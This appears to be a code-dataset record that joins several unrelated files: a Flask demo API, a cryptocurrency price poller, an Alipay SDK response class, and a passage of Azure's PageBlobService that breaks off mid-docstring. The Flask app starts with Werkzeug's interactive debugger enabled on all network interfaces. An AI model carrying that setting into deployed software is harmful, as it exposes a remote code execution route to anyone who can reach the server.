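# miller_rabin is to compare it with naive trial division on small inputs, e.g.:
#
#     def is_prime_naive(n):
#         if n < 2:
#             return False
#         return all(n % d for d in range(2, int(n ** 0.5) + 1))
#
#     assert all(miller_rabin(n) == is_prime_naive(n) for n in range(1, 2000))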
| 19.785714
| 62
| 0.405535
|
41c22598cef5606219069802493372d21e4e826a
| 2,876
|
py
|
Python
|
python/tron.py
|
newrelic-experimental/demo-pythontron
|
0561d7e496da3a518c28102010c3c76445a47307
|
[
"Apache-2.0"
] | null | null | null |
python/tron.py
|
newrelic-experimental/demo-pythontron
|
0561d7e496da3a518c28102010c3c76445a47307
|
[
"Apache-2.0"
] | null | null | null |
python/tron.py
|
newrelic-experimental/demo-pythontron
|
0561d7e496da3a518c28102010c3c76445a47307
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
from flask import Flask, Response
from api.help import help_message
from dependency_injection_container import Container
from lib.app_logging import AppLogging
from lib.tron_response import TronResponse
from repository.helpers import inventory_repository_selector
app = Flask(__name__)
@app.errorhandler(Exception)
def handle_exception(e):
message = "{}".format(e)
AppLogging.error(message)
return message, 500
@app.route("/")
def index():
return get_flask_response(index.index_message())
@app.route("/api")
def index_api():
return get_flask_response(index.index_message())
@app.route("/api/help")
def help():
return get_flask_response(help_message())
@app.route("/api/behaviors")
def behaviors():
return get_flask_response(behaviors.list_behaviors())
@app.route("/api/validateMessage")
def validateMessage():
return get_flask_response(message.validate())
@app.route("/api/inventory")
def inventory_list():
return get_flask_response(inventory.get_inventory())
@app.route("/api/inventory/<string:item_id>")
def inventory_item(item_id):
return get_flask_response(inventory.get_inventory_item(item_id))
@app.route("/api/database/health")
def database_health_check():
is_connected = database_connector.connect().is_connected()
status_code = 200 if is_connected else 500
return get_flask_response(TronResponse(status_code=status_code))
@app.after_request
def add_headers(response):
return http_utils.add_response_headers(response)
def get_flask_response(tron_response):
response = Response(
tron_response.get_body(),
status=tron_response.get_status_code(),
mimetype='application/json'
)
for k, v in tron_response.get_headers().items():
response.headers[k] = v
return response
if __name__ == "__main__":
container = Container()
app_config = container.app_config()
container.config.from_dict(app_config.asdict())
container.wire(modules=[sys.modules[__name__]])
arguments = container.arguments()
AppLogging.init(arguments.logging_level)
if inventory_repository_selector(app_config) == 'database':
container.setup_database_action().execute()
database_connector = container.database_connector()
http_utils = container.http_utils()
inventory = container.inventory_handler()
message = container.message_handler()
behaviors = container.behaviors_handler()
index = container.index_handler()
debug_mode = arguments.debug_mode
if debug_mode is not None and debug_mode == 'On':
os.environ["FLASK_ENV"] = "development"
port = int(app_config.get_app_port())
AppLogging.info("Listening on port: " + str(port))
AppLogging.info(index.get_message())
app.run(use_debugger=True, use_reloader=False, threaded=True, host='0.0.0.0', port=port)
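    # Editor's sketch (not part of the original file): with the server listening,
    # the JSON endpoints can be smoke-tested from another process; 'port' is the
    # same configured value used above.
    #
    #     import requests
    #     print(requests.get("http://localhost:{0}/api/help".format(port)).json())
    #     print(requests.get("http://localhost:{0}/api/inventory".format(port)).json())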
| 25.678571
| 92
| 0.73783
|
1fff79c7c297ddae3bbff2a59c09186fc49b4ada
| 11,710
|
py
|
Python
|
ces/coin_database.py
|
coincell-pub/CLI-crypto-console
|
30c2d2c64e14d0cfa54aafd0cabb7d1524cd5d56
|
[
"BSD-2-Clause",
"BSD-2-Clause-FreeBSD"
] | null | null | null |
ces/coin_database.py
|
coincell-pub/CLI-crypto-console
|
30c2d2c64e14d0cfa54aafd0cabb7d1524cd5d56
|
[
"BSD-2-Clause",
"BSD-2-Clause-FreeBSD"
] | null | null | null |
ces/coin_database.py
|
coincell-pub/CLI-crypto-console
|
30c2d2c64e14d0cfa54aafd0cabb7d1524cd5d56
|
[
"BSD-2-Clause",
"BSD-2-Clause-FreeBSD"
] | null | null | null |
# Copyright (c) 2021, coincell
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import requests
import threading
import json
import re
from exceptions import *
from utils import CoinPrice
class CoinMetadata:
def __init__(self, code, name, price, rank, volume_24h, market_cap, available_supply,
total_supply, max_supply, change_1h, change_24h, change_7d):
self.code = code
self.name = name
self.price = price
self.rank = rank
self.volume_24h = volume_24h
self.market_cap = market_cap
self.available_supply = available_supply
self.total_supply = total_supply
self.max_supply = max_supply
self.change_1h = change_1h
self.change_24h = change_24h
self.change_7d = change_7d
class CoinDatabase:
API_URL = 'https://api.coinmarketcap.com/v1/ticker/?convert={0}'
WEB_URL = 'https://coinmarketcap.com/all/views/all/'
VALID_FIAT_CURRENCIES = set([
'aud', 'brl', 'cad', 'chf', 'clp', 'cny', 'czk', 'dkk', 'eur', 'gbp', 'hkd', 'huf', 'idr',
'ils', 'inr', 'jpy', 'krw', 'mxn', 'myr', 'nok', 'nzd', 'php', 'pkr', 'pln', 'rub', 'sek',
'sgd', 'thb', 'try', 'twd', 'zar', 'usd'
])
def __init__(self, fiat_currency):
self.fiat_currency = fiat_currency.lower()
if self.fiat_currency not in CoinDatabase.VALID_FIAT_CURRENCIES:
raise ConfigException('Unknown fiat currency "{0}"'.format(fiat_currency))
self._running = True
self._metadata = {}
self._metadata_condition = threading.Condition()
self._stop_condition = threading.Condition()
self._api_url = CoinDatabase.API_URL.format(self.fiat_currency.upper())
self._web_url = CoinDatabase.WEB_URL
self._update_thread = threading.Thread(target=self.poll_data)
self._update_thread.start()
def stop(self):
self._running = False
with self._stop_condition:
self._stop_condition.notify()
self._update_thread.join()
def wait_for_data(self):
with self._metadata_condition:
if len(self._metadata) == 0:
self._metadata_condition.wait()
def get_currency_price(self, code):
if self.has_coin(code):
price = self.get_currency_metadata(code).price
return CoinPrice(code, price, self.fiat_currency)
else:
return CoinPrice(code)
def get_currency_metadata(self, code):
with self._metadata_condition:
if code in self._metadata:
return self._metadata[code]
else:
raise UnknownCurrencyException(code)
def has_coin(self, code):
with self._metadata_condition:
return code in self._metadata
def get_top_coins(self, top_limit):
coins = []
with self._metadata_condition:
for coin in self._metadata.values():
if coin.rank is not None and coin.rank <= top_limit:
coins.append(coin)
return sorted(coins, key=lambda i: i.rank)
def get_coins(self):
with self._metadata_condition:
return self._metadata.values()
def _extract_float(self, value):
return None if value is None else float(value)
def _merge_attribute(self, lhs, rhs, attribute):
if getattr(rhs, attribute) is not None:
setattr(lhs, attribute, getattr(rhs, attribute))
def _add_coin(self, code, coin):
if code in self._metadata:
stored_coin = self._metadata[code]
self._merge_attribute(stored_coin, coin, "name")
self._merge_attribute(stored_coin, coin, "price")
self._merge_attribute(stored_coin, coin, "rank")
self._merge_attribute(stored_coin, coin, "volume_24h")
self._merge_attribute(stored_coin, coin, "market_cap")
self._merge_attribute(stored_coin, coin, "available_supply")
self._merge_attribute(stored_coin, coin, "total_supply")
self._merge_attribute(stored_coin, coin, "max_supply")
self._merge_attribute(stored_coin, coin, "change_1h")
self._merge_attribute(stored_coin, coin, "change_24h")
self._merge_attribute(stored_coin, coin, "change_7d")
else:
self._metadata[code] = coin
def _load_from_api(self):
result = None
try:
raw_result = requests.get(self._api_url)
result = json.loads(raw_result.text)
except Exception as ex:
# TODO: somehow log this
pass
if result is not None:
with self._metadata_condition:
for entry in result:
try:
coin = CoinMetadata(
entry['symbol'],
entry['name'],
self._extract_float(entry['price_' + self.fiat_currency]),
int(entry['rank']),
self._extract_float(entry['24h_volume_' + self.fiat_currency]),
self._extract_float(entry['market_cap_' + self.fiat_currency]),
self._extract_float(entry['available_supply']),
self._extract_float(entry['total_supply']),
self._extract_float(entry['max_supply']),
self._extract_float(entry['percent_change_1h']),
self._extract_float(entry['percent_change_24h']),
self._extract_float(entry['percent_change_7d'])
)
self._add_coin(entry['symbol'], coin)
except Exception as ex:
if 'symbol' in entry:
                            print('Failed to parse metadata for "{0}": {1}'.format(
                                entry['symbol'],
                                ex
                            ))
                        else:
                            print('Failed to parse currency metadata: {0}'.format(ex))
self._metadata_condition.notify_all()
def _load_from_web(self):
if self.fiat_currency == 'usd':
conversion_rate = 1.0
else:
data = requests.get(self._api_url).text
data = json.loads(data)
# Find the conversion rate between USD and whatever fiat currency we're using
for coin in data:
if coin['symbol'] == 'BTC':
conversion_rate = float(coin['price_' + self.fiat_currency]) / float(coin['price_usd'])
data = requests.get(self._web_url).text
table_start = data.find('id="currencies-all"')
table_end = data.find('</table>', table_start)
table = data[table_start:table_end]
attribute_keys = {
'class="text-center">' : 'rank',
'currency-name-container' : 'name',
'col-symbol' : 'code',
'market-cap' : 'market-cap',
'class="price"' : 'price',
'circulating-supply' : 'circulating-supply',
'class="volume"' : 'volume',
'data-timespan="1h"' : 'change-1h',
'data-timespan="24h"' : 'change-24h',
'data-timespan="7d"' : 'change-7d',
}
price_attributes = ['price', 'market-cap', 'volume']
number_attributes = price_attributes + ['circulating-supply']
percentage_attributes = ['change-1h', 'change-24h', 'change-7d']
with self._metadata_condition:
for entry in table.split('<tr ')[1:]:
attributes = {}
for column in entry.split('<td '):
for key, value in attribute_keys.items():
if key in column:
index = column.find(key)
match = re.findall('>([^<]+)<', column[index:], re.MULTILINE)
                            match = [i.strip() for i in match]
                            match = [i for i in match if len(i) > 0]
if len(match) > 0:
attributes[value] = match[0].strip()
else:
attributes[value] = None
for key in number_attributes:
if attributes.get(key, None):
try:
attributes[key] = float(attributes[key].replace('$', '').replace(',', ''))
except:
attributes[key] = None
for key in price_attributes:
if attributes.get(key, None):
attributes[key] *= conversion_rate
for key in percentage_attributes:
if attributes.get(key, None):
attributes[key] = float(attributes[key].replace('%', ''))
try:
coin = CoinMetadata(
attributes['code'],
attributes['name'],
attributes['price'],
int(attributes['rank']),
attributes['volume'],
attributes['market-cap'],
attributes['circulating-supply'],
None,
None,
attributes.get('change-1h', None),
attributes.get('change-24h', None),
attributes.get('change-7d', None)
)
self._add_coin(attributes['code'], coin)
except Exception as ex:
pass
def poll_data(self):
while self._running:
# Load all coins by parsing coinmarketcap.com/all/views/all/
try:
self._load_from_web()
except:
pass
# Now get some better data for the coins that are served through the API
self._load_from_api()
with self._stop_condition:
# Sleep for 5 minutes
self._stop_condition.wait(60 * 5)
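# Editor's sketch (not part of the original file): minimal usage of CoinDatabase,
# assuming the coinmarketcap endpoints above are still reachable; the 'usd' fiat
# currency and the 'BTC' symbol are illustrative choices.
if __name__ == '__main__':
    db = CoinDatabase('usd')
    try:
        db.wait_for_data()  # block until the first API poll has populated metadata
        if db.has_coin('BTC'):
            print(db.get_currency_metadata('BTC').price)
    finally:
        db.stop()  # stop the background polling thread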
| 44.694656
| 107
| 0.563792
|
64d32016949b8988e7f3520c8fe40ba9ba078b48
| 1,041
|
py
|
Python
|
alipay/aop/api/response/AlipayUserCardActivateurlQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/response/AlipayUserCardActivateurlQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/response/AlipayUserCardActivateurlQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayUserCardActivateurlQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayUserCardActivateurlQueryResponse, self).__init__()
self._apply_card_url = None
self._callback = None
@property
def apply_card_url(self):
return self._apply_card_url
@apply_card_url.setter
def apply_card_url(self, value):
self._apply_card_url = value
@property
def callback(self):
return self._callback
@callback.setter
def callback(self, value):
self._callback = value
def parse_response_content(self, response_content):
response = super(AlipayUserCardActivateurlQueryResponse, self).parse_response_content(response_content)
if 'apply_card_url' in response:
self.apply_card_url = response['apply_card_url']
if 'callback' in response:
self.callback = response['callback']
| 28.916667
| 111
| 0.701249
|
30ec0d5c40fdf63edb0374a6e5345cb3b288ed38
| 82,060
|
py
|
Python
|
virtual_env/.cognitive_venv/Lib/site-packages/azure/storage/blob/pageblobservice.py
|
RajdeepBiswas/AI_Enabled_Image_Bucketization
|
d8cd23d49d5f6a93003e3a20a637fdb8f2032f19
|
[
"MIT"
] | 1
|
2021-10-16T19:33:56.000Z
|
2021-10-16T19:33:56.000Z
|
virtual_env/.cognitive_venv/Lib/site-packages/azure/storage/blob/pageblobservice.py
|
RajdeepBiswas/AI_Enabled_Image_Bucketization
|
d8cd23d49d5f6a93003e3a20a637fdb8f2032f19
|
[
"MIT"
] | null | null | null |
virtual_env/.cognitive_venv/Lib/site-packages/azure/storage/blob/pageblobservice.py
|
RajdeepBiswas/AI_Enabled_Image_Bucketization
|
d8cd23d49d5f6a93003e3a20a637fdb8f2032f19
|
[
"MIT"
] | 1
|
2019-07-25T15:09:05.000Z
|
2019-07-25T15:09:05.000Z
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import sys
from os import path
from azure.storage.common._common_conversion import (
_int_to_str,
_to_str,
_datetime_to_utc_string,
_get_content_md5,
)
from azure.storage.common._constants import (
SERVICE_HOST_BASE,
DEFAULT_PROTOCOL,
)
from azure.storage.common._error import (
_validate_not_none,
_validate_type_bytes,
_validate_encryption_required,
_validate_encryption_unsupported,
_ERROR_VALUE_NEGATIVE,
)
from azure.storage.common._http import HTTPRequest
from azure.storage.common._serialization import (
_get_data_bytes_only,
_add_metadata_headers,
)
from ._deserialization import (
_convert_xml_to_page_ranges,
_parse_page_properties,
_parse_base_properties,
)
from ._encryption import _generate_blob_encryption_data
from ._error import (
_ERROR_PAGE_BLOB_SIZE_ALIGNMENT,
)
from ._serialization import (
_get_path,
_validate_and_format_range_headers,
)
from ._upload_chunking import (
_PageBlobChunkUploader,
_upload_blob_chunks,
)
from .baseblobservice import BaseBlobService
from .models import (
_BlobTypes,
ResourceProperties)
if sys.version_info >= (3,):
from io import BytesIO
else:
from cStringIO import StringIO as BytesIO
# Keep this value sync with _ERROR_PAGE_BLOB_SIZE_ALIGNMENT
_PAGE_ALIGNMENT = 512
class PageBlobService(BaseBlobService):
'''
Page blobs are a collection of 512-byte pages optimized for random read and
write operations. To create a page blob, you initialize the page blob and
specify the maximum size the page blob will grow. To add or update the
contents of a page blob, you write a page or pages by specifying an offset
and a range that align to 512-byte page boundaries. A write to a page blob
can overwrite just one page, some pages, or up to 4 MB of the page blob.
Writes to page blobs happen in-place and are immediately committed to the
blob. The maximum size for a page blob is 8 TB.
:ivar int MAX_PAGE_SIZE:
The size of the pages put by create_blob_from_* methods. Smaller pages
may be put if there is less data provided. The maximum page size the service
supports is 4MB. When using the create_blob_from_* methods, empty pages are skipped.
'''
MAX_PAGE_SIZE = 4 * 1024 * 1024
def __init__(self, account_name=None, account_key=None, sas_token=None, is_emulated=False,
protocol=DEFAULT_PROTOCOL, endpoint_suffix=SERVICE_HOST_BASE, custom_domain=None,
request_session=None, connection_string=None, socket_timeout=None, token_credential=None):
'''
:param str account_name:
The storage account name. This is used to authenticate requests
signed with an account key and to construct the storage endpoint. It
is required unless a connection string is given, or if a custom
domain is used with anonymous authentication.
:param str account_key:
The storage account key. This is used for shared key authentication.
            If neither account key nor sas token is specified, anonymous access
will be used.
:param str sas_token:
A shared access signature token to use to authenticate requests
instead of the account key. If account key and sas token are both
specified, account key will be used to sign. If neither are
specified, anonymous access will be used.
:param bool is_emulated:
Whether to use the emulator. Defaults to False. If specified, will
override all other parameters besides connection string and request
session.
:param str protocol:
The protocol to use for requests. Defaults to https.
:param str endpoint_suffix:
The host base component of the url, minus the account name. Defaults
to Azure (core.windows.net). Override this to use the China cloud
(core.chinacloudapi.cn).
:param str custom_domain:
The custom domain to use. This can be set in the Azure Portal. For
example, 'www.mydomain.com'.
:param requests.Session request_session:
The session object to use for http requests.
:param str connection_string:
If specified, this will override all other parameters besides
request session. See
http://azure.microsoft.com/en-us/documentation/articles/storage-configure-connection-string/
for the connection string format.
:param int socket_timeout:
If specified, this will override the default socket timeout. The timeout specified is in seconds.
See DEFAULT_SOCKET_TIMEOUT in _constants.py for the default value.
:param token_credential:
A token credential used to authenticate HTTPS requests. The token value
should be updated before its expiration.
:type `~azure.storage.common.TokenCredential`
'''
self.blob_type = _BlobTypes.PageBlob
super(PageBlobService, self).__init__(
account_name, account_key, sas_token, is_emulated, protocol, endpoint_suffix,
custom_domain, request_session, connection_string, socket_timeout, token_credential)
def create_blob(
self, container_name, blob_name, content_length, content_settings=None,
sequence_number=None, metadata=None, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None, premium_page_blob_tier=None):
'''
Creates a new Page Blob.
See create_blob_from_* for high level functions that handle the
creation and upload of large blobs with automatic chunking and
progress notifications.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param int content_length:
Required. This header specifies the maximum size
for the page blob, up to 1 TB. The page blob size must be aligned
to a 512-byte boundary.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set properties on the blob.
:param int sequence_number:
The sequence number is a user-controlled value that you can use to
track requests. The value of the sequence number must be between 0
and 2^63 - 1.The default value is 0.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:param PremiumPageBlobTier premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the new Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_encryption_unsupported(self.require_encryption, self.key_encryption_key)
return self._create_blob(
container_name,
blob_name,
content_length,
content_settings=content_settings,
sequence_number=sequence_number,
metadata=metadata,
lease_id=lease_id,
premium_page_blob_tier=premium_page_blob_tier,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout
)
def incremental_copy_blob(self, container_name, blob_name, copy_source,
metadata=None, destination_if_modified_since=None, destination_if_unmodified_since=None,
destination_if_match=None, destination_if_none_match=None, destination_lease_id=None,
source_lease_id=None, timeout=None):
'''
Copies an incremental copy of a blob asynchronously. This operation returns a copy operation
properties object, including a copy ID you can use to check or abort the
copy operation. The Blob service copies blobs on a best-effort basis.
The source blob for an incremental copy operation must be a page blob.
Call get_blob_properties on the destination blob to check the status of the copy operation.
The final blob will be committed when the copy completes.
:param str container_name:
Name of the destination container. The container must exist.
:param str blob_name:
Name of the destination blob. If the destination blob exists, it will
be overwritten. Otherwise, it will be created.
:param str copy_source:
A URL of up to 2 KB in length that specifies an Azure page blob.
The value should be URL-encoded as it would appear in a request URI.
The copy source must be a snapshot and include a valid SAS token or be public.
Example:
https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>&sastoken
:param metadata:
Name-value pairs associated with the blob as metadata. If no name-value
pairs are specified, the operation will copy the metadata from the
source blob or file to the destination blob. If one or more name-value
pairs are specified, the destination blob is created with the specified
metadata, and metadata is not copied from the source blob or file.
:type metadata: dict(str, str).
:param datetime destination_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only
if the destination blob has been modified since the specified date/time.
If the destination blob has not been modified, the Blob service returns
status code 412 (Precondition Failed).
:param datetime destination_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only if the destination blob
            has not been modified since the specified date/time. If the destination blob
has been modified, the Blob service returns status code 412 (Precondition Failed).
:param ETag destination_if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
matches the ETag value for an existing destination blob. If the ETag for
the destination blob does not match the ETag specified for If-Match, the
Blob service returns status code 412 (Precondition Failed).
:param ETag destination_if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
does not match the ETag value for the destination blob. Specify the wildcard
character (*) to perform the operation only if the destination blob does not
exist. If the specified condition isn't met, the Blob service returns status
code 412 (Precondition Failed).
:param str destination_lease_id:
The lease ID specified for this header must match the lease ID of the
destination blob. If the request does not include the lease ID or it is not
valid, the operation fails with status code 412 (Precondition Failed).
:param str source_lease_id:
Specify this to perform the Copy Blob operation only if
the lease ID given matches the active lease ID of the source blob.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: Copy operation properties such as status, source, and ID.
:rtype: :class:`~azure.storage.blob.models.CopyProperties`
'''
return self._copy_blob(container_name, blob_name, copy_source,
metadata,
source_if_modified_since=None, source_if_unmodified_since=None,
source_if_match=None, source_if_none_match=None,
destination_if_modified_since=destination_if_modified_since,
destination_if_unmodified_since=destination_if_unmodified_since,
destination_if_match=destination_if_match,
destination_if_none_match=destination_if_none_match,
destination_lease_id=destination_lease_id,
source_lease_id=source_lease_id, timeout=timeout,
incremental_copy=True)
def update_page(
self, container_name, blob_name, page, start_range, end_range,
validate_content=False, lease_id=None, if_sequence_number_lte=None,
if_sequence_number_lt=None, if_sequence_number_eq=None,
if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Updates a range of pages.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param bytes page:
Content of the page.
:param int start_range:
Start of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param int end_range:
End of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param bool validate_content:
If true, calculates an MD5 hash of the page content. The storage
service checks the hash of the content that has arrived
with the hash that was sent. This is primarily valuable for detecting
bitflips on the wire if using http instead of https as https (the default)
will already validate. Note that this MD5 hash is not stored with the
blob.
:param str lease_id:
Required if the blob has an active lease.
:param int if_sequence_number_lte:
If the blob's sequence number is less than or equal to
the specified value, the request proceeds; otherwise it fails.
:param int if_sequence_number_lt:
If the blob's sequence number is less than the specified
value, the request proceeds; otherwise it fails.
:param int if_sequence_number_eq:
If the blob's sequence number is equal to the specified
value, the request proceeds; otherwise it fails.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value matches the
value specified. If the values do not match, the Blob service fails.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value does not
match the value specified. If the values are identical, the Blob
service fails.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_encryption_unsupported(self.require_encryption, self.key_encryption_key)
return self._update_page(
container_name,
blob_name,
page,
start_range,
end_range,
validate_content=validate_content,
lease_id=lease_id,
if_sequence_number_lte=if_sequence_number_lte,
if_sequence_number_lt=if_sequence_number_lt,
if_sequence_number_eq=if_sequence_number_eq,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout
)
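    # Editor's sketch (not part of the original library code): writes must be aligned to
    # 512-byte pages, i.e. start_range % 512 == 0 and (end_range + 1) % 512 == 0. For
    # example, writing one page at offset 0 and one at offset 1024 of a pre-created blob
    # (account, container and blob names are illustrative):
    #
    #     service = PageBlobService(account_name='myaccount', account_key='...')
    #     service.create_blob('mycontainer', 'myblob', content_length=4096)
    #     service.update_page('mycontainer', 'myblob', b'\x01' * 512, 0, 511)
    #     service.update_page('mycontainer', 'myblob', b'\x02' * 512, 1024, 1535)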
def update_page_from_url(self, container_name, blob_name, start_range, end_range, copy_source_url,
source_range_start, source_content_md5=None, source_if_modified_since=None,
source_if_unmodified_since=None, source_if_match=None, source_if_none_match=None,
lease_id=None, if_sequence_number_lte=None, if_sequence_number_lt=None,
if_sequence_number_eq=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
"""
Updates a range of pages to a page blob where the contents are read from a URL.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob.
:param int start_range:
Start of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param int end_range:
End of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param str copy_source_url:
            The URL of the source data. It can point to any Azure Blob or File that is either public or has a
shared access signature attached.
:param int source_range_start:
This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source.
The service will read the same number of bytes as the destination range (end_range-start_range).
:param str source_content_md5:
If given, the service will calculate the MD5 hash of the block content and compare against this value.
:param datetime source_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the source resource has been modified since the specified time.
:param datetime source_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the source resource has not been modified since the specified date/time.
:param str source_if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the source resource's ETag matches the value specified.
:param str source_if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the source resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the source resource does not exist, and fail the
operation if it does exist.
:param str lease_id:
Required if the blob has an active lease.
:param int if_sequence_number_lte:
If the blob's sequence number is less than or equal to
the specified value, the request proceeds; otherwise it fails.
:param int if_sequence_number_lt:
If the blob's sequence number is less than the specified
value, the request proceeds; otherwise it fails.
:param int if_sequence_number_eq:
If the blob's sequence number is equal to the specified
value, the request proceeds; otherwise it fails.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
